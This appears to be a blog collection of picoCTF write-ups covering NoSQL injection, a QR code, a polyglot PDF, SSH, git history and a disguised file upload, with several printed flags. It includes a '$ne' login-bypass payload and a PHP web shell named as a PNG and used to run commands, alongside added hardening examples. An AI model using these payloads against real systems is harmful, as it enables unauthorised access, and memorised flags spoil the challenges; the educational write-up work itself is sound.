# No Sql Injection

```
wget https://artifacts.picoctf.net/c_atlas/37/app.tar.gz
tar -xvzf app.tar.gz
```

Open Burp Suite, log in with any credentials, intercept the request, send it to Repeater and edit the body to:

```
"email":"{\"$ne\": \"null\"}",
"password":"{\"$ne\": \"null\"}"
```

Response:

```
{"success":true,"email":"picoplayer355@picoctf.org","token":"cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==","firstName":"pico","lastName":"player"}
```

The `token` value is Base64; decoding it gives the flag:

picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_67b1a3c8}

NoSQL injection trick:

```
User: {"$ne":"null"}
Password: {"$ne":"null"}
```
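Why the `$ne` payload logs in, and the type check that stops it, as an added example that is not the challenge's code. The in-memory `findOne`, the `parseLoose` helper and the sample user are constructed for illustration; the vulnerable pattern is assumed from the shape of the payload.

```javascript
// Constructed sample data. Plaintext passwords only keep the sample short;
// a real application compares against a password hash.
const users = [{ email: "alice@example.test", password: "correct horse" }];

// Minimal stand-in for a MongoDB-style filter: plain equality and $ne only.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object") {
      if ("$ne" in cond) return doc[field] !== cond.$ne;
      return false; // other operators are not modelled here
    }
    return doc[field] === cond;
  });
}
const findOne = (filter) => users.find((u) => matches(u, filter)) || null;

// Assumed vulnerable pattern: a string field that looks like JSON is parsed
// and placed into the query, so it arrives as an operator object.
function parseLoose(value) {
  if (typeof value === "string" && value.trim().startsWith("{")) {
    try { return JSON.parse(value); } catch { return value; }
  }
  return value;
}
function loginVulnerable(body) {
  // {"$ne": "null"} matches every user whose field is not the string "null".
  return findOne({ email: parseLoose(body.email), password: parseLoose(body.password) });
}

// Hardened: credentials must be strings and are only ever compared as literals.
function loginHardened(body) {
  const { email, password } = body;
  if (typeof email !== "string" || typeof password !== "string") return null;
  return findOne({ email, password });
}

// The payload from the write-up, as it appears in the request body.
const payload = { email: '{"$ne": "null"}', password: '{"$ne": "null"}' };
console.log("vulnerable:", loginVulnerable(payload)); // returns the first user
console.log("hardened:", loginHardened(payload));     // null
```
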

June 5, 2026

# Scan Surprise

I’ve gotten bored of handing out flags as text. Wouldn’t it be cool if they were an image instead?

Solution:

1. `ssh -p 64695 ctf-player@atlas.picoctf.net`
2. `ls` (the QR code image is in this directory)
3. `zbarimg flag.png`

zbar-tools is a Linux package that lets you scan and read barcodes or QR codes directly from the command line. It includes tools like:

- ✅ `zbarimg` → scans QR codes/barcodes from images (PNG, JPG, etc.)
- ✅ `zbarcam` → scans QR codes/barcodes live from a webcam

June 5, 2026

# Secret of the Polyglot

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they’re getting conflicting information on what type of file it is. They’ve brought you in as an external expert to examine the file. Can you extract all the information from this strange file?

Solution:

1. `wget https://artifacts.picoctf.net/c_titan/9/flag2of2-final.pdf`
2. `ls`
3. `convert flag2of2-final.pdf flag2of2-final.png`
4. `open flag2of2-final.png` shows the first part of the flag: `picoCTF{f1u3n7_`
5. `apt install poppler-utils`
6. `pdftotext flag2of2-final.pdf`
7. `cat flag2of2-final.txt` shows the rest: `1n_pn9_&_pdf_7f9bccd1}`

...

June 5, 2026

# SSTI1

Description:

I made a cool website where you can announce whatever you want! Try it out! I heard templating is a cool and modular way to build web apps! Check out my website here!

Hints:

Server Side Template Injection

Solution:

Browse to the web site and you will see a web page that includes the text

## Verify SSTI

The hint has already given away that the site uses server-side templates, but we need to verify that and find out the backend technology used. ...

June 5, 2026

# Super SSH.md

Description:

Using a Secure Shell (SSH) is going to be pretty important. Can you ssh as ctf-player to titan.picoctf.net at port 52017 to get the flag? You’ll also need the password 6dd28e9b. If asked, accept the fingerprint with yes.

Solution:

```
ssh -p 52017 ctf-player@titan.picoctf.net
```

- `ssh` → Secure Shell, used to remotely log into another computer/server.
- `-p 52017` → Specifies a non-default port (52017 instead of the usual 22).
- `ctf-player@titan.picoctf.net` → username: `ctf-player`, server: `titan.picoctf.net`

After that, enter the password ...

June 5, 2026

# time machine

Description:

What was I last working on? I remember writing a note to help me remember… You can download the challenge files here: challenge.zip

Solution:

```
wget https://artifacts.picoctf.net/c_titan/68/challenge.zip
unzip challenge.zip
cd drop-in/
cat message.txt
```

Finally:

```
┌──(root㉿Harsh)-[/home/jhagan/h/drop-in]
└─# git log
commit 705ff639b7846418603a3272ab54536e01e3dc43 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:36 2024 +0000

    picoCTF{t1m3m@ch1n3_b476ca06}
```

Conclusion:

1. Git keeps history — even if the file is changed or deleted

Git records every commit (change) with:

- A unique commit hash
- An author and timestamp
- A commit message

Even if the file with the sensitive information is later removed or modified, the data can still be recovered by checking older commits. ...

June 5, 2026

# Trickster

Description:

I found a web app that can help process images: PNG

Solution:

Create a file named `untitled.png.php` with this content:

```
PNG
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>
```

Upload this file and browse to http://atlas.picoctf.net:58157/uploads/untitled.png.php

Run:

```
ls -al
ls -al /var/www/html
cat /var/www/html/GAZWIMLEGU2DQ.txt
```
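The upload above is accepted because the name contains `.png` and the content starts with the text `PNG`. The added example below (not the challenge's code) puts a weak check of that kind next to a stricter one; `weakCheck`, `strictCheck` and the sample buffers are constructed for illustration, and the weak check is an assumption about how such a filter might look.

```javascript
const crypto = require("crypto");

// Full 8-byte PNG signature; the ASCII text "PNG" alone is not a PNG file.
const PNG_SIGNATURE = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);

// Assumed weak filter: ".png" anywhere in the name, "PNG" near the start of the data.
function weakCheck(filename, data) {
  return filename.includes(".png") && data.subarray(0, 4).includes("PNG");
}

// Stricter filter: exactly one extension, allowlisted; full signature;
// the file is stored under a server-generated name, never the client's.
function strictCheck(filename, data) {
  const base = filename.split(/[\\/]/).pop();
  const parts = base.split(".");
  if (parts.length !== 2 || parts[0] === "") {
    return { ok: false, reason: "name must be <stem>.png" };
  }
  if (parts[1].toLowerCase() !== "png") {
    return { ok: false, reason: "extension not allowed" };
  }
  if (data.length < 8 || !data.subarray(0, 8).equals(PNG_SIGNATURE)) {
    return { ok: false, reason: "bad PNG signature" };
  }
  // A valid signature does not prove the rest of the file is harmless, so the
  // upload directory should also be served with script execution disabled.
  const storedName = crypto.randomBytes(16).toString("hex") + ".png";
  return { ok: true, storedName };
}

// Constructed samples: a text file that only pretends to be a PNG, and a
// buffer that starts with the real signature.
const fakePng = Buffer.from("PNG\n<html>placeholder body</html>");
const realPng = Buffer.concat([PNG_SIGNATURE, Buffer.from("constructed-chunk-data")]);

console.log(weakCheck("untitled.png.php", fakePng));   // true
console.log(strictCheck("untitled.png.php", fakePng)); // rejected on the name
console.log(strictCheck("untitled.png", fakePng));     // rejected on the signature
console.log(strictCheck("photo.png", realPng));        // accepted, random stored name
```
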

June 5, 2026

# unminify

I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster!

Solution:

```
curl http://titan.picoctf.net:50120/
```

The flag is visible in the output:

```
class="picoCTF{pr3tty_c0d3_dbe259ce}"
```

June 5, 2026

# webdecode

WebDecode

Do you know how to use the web inspector? Start searching here to find the flag

Solution:

Inspect the source of the about page. Right above the header there is a section with this attribute:

```
notify_true="cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDJjZGNiNTl9"
```

Base64-decode this value to find the flag.

Use: https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')

Flag: picoCTF{web_succ3ssfully_d3c0ded_02c…}

June 5, 2026

# Blame Game.md

Description:

Someone’s commits seems to be preventing the program from working. Who is it? You can download the challenge files here: challenge.zip

Hints:

- In collaborative projects, many users can make many changes. How can you see the changes within one file?
- Read the chapter on Git from the picoPrimer here
- You can use python3 .py to try running the code, though you won’t need to for this challenge.

Challenge link: https://play.picoctf.org/practice/challenge/405

Solution:

## Analyse the git repo

We start by unpacking the zip-file ...

June 5, 2026